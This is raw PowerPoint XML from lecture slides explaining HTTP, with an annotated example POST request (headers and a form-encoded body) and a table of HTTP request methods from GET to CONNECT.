                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B611A1C-78AB-BF95-8F52-8FE7F2622DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2972563"/>
            <a:ext cx="8215813" cy="29051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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0.3323.51</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66567261-B7E1-847B-AFD7-FBF2D24BA5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3335215"/>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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1CC72E-2EE4-1CD3-9A98-048980475507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3685353"/>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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41ADC015-BF7F-0A02-B22D-8B059C5C799B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="4061815"/>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err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: www.google.com/search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87156660-AB88-DB2D-B4A6-5DE7F996269B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="5461852"/>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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw@ccs.neu.edu&amp;job</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=professor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C478E7E3-72BA-70FB-CA20-22B748F2102B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3580429" y="5381076"/>
            <a:ext cx="7301410" cy="1211220"/>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 Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C783F4-3543-DFC2-7D51-E4501F93A0D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24429" y="4382103"/>
            <a:ext cx="3484729" cy="3457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How much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> data?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1B8532-D3C3-8745-F600-CB1B4BAF79FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="4285928"/>
            <a:ext cx="763819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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFFBD27-31E2-26F5-4738-06F5322F3873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="4431183"/>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Content-Length: 48</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE753413-EE00-E3B9-4F4C-AD99A0820688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24429" y="4759367"/>
            <a:ext cx="3484729" cy="3457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How is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> data encoded?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDEC9B9-2DAC-7F2A-E69F-68144835DD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116604" y="4663192"/>
            <a:ext cx="9123144"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 Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15FF143-75FC-3BB1-4156-8FF0564B5929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="4808447"/>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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2237812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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="16" presetClass="entr" presetSubtype="21"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21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetID="16" presetClass="entr" presetSubtype="21"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Vertic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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="16" presetClass="entr" presetSubtype="21"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arn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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32" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="2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838200" y="143069"/>
            <a:ext cx="10515600" cy="1200539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="102" name="Table 102"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2652664" y="1579478"/>
          <a:ext cx="7961789" cy="4952534"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{69CF1AB2-1976-4502-BF36-3FF5EA218861}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1488790">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6472999">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="357188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Verb</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="485259">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Retrieve resource at a given path</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="561034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>POST</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr"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800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Submit data to a given path, might create resources as new paths</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="805992">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>HEAD</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Identical to a GET, but response omits body</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="906617">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Submit data to a given path, creating resource if it exists or modifying existing resource at that path</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" i="1">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="357188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>DELETE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Deletes resource at a given path</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="357188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>TRACE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Echoes request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="561034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>OPTIONS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Returns supported HTTP methods given a path</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="561034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800"/>
                        <a:t>CONNECT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
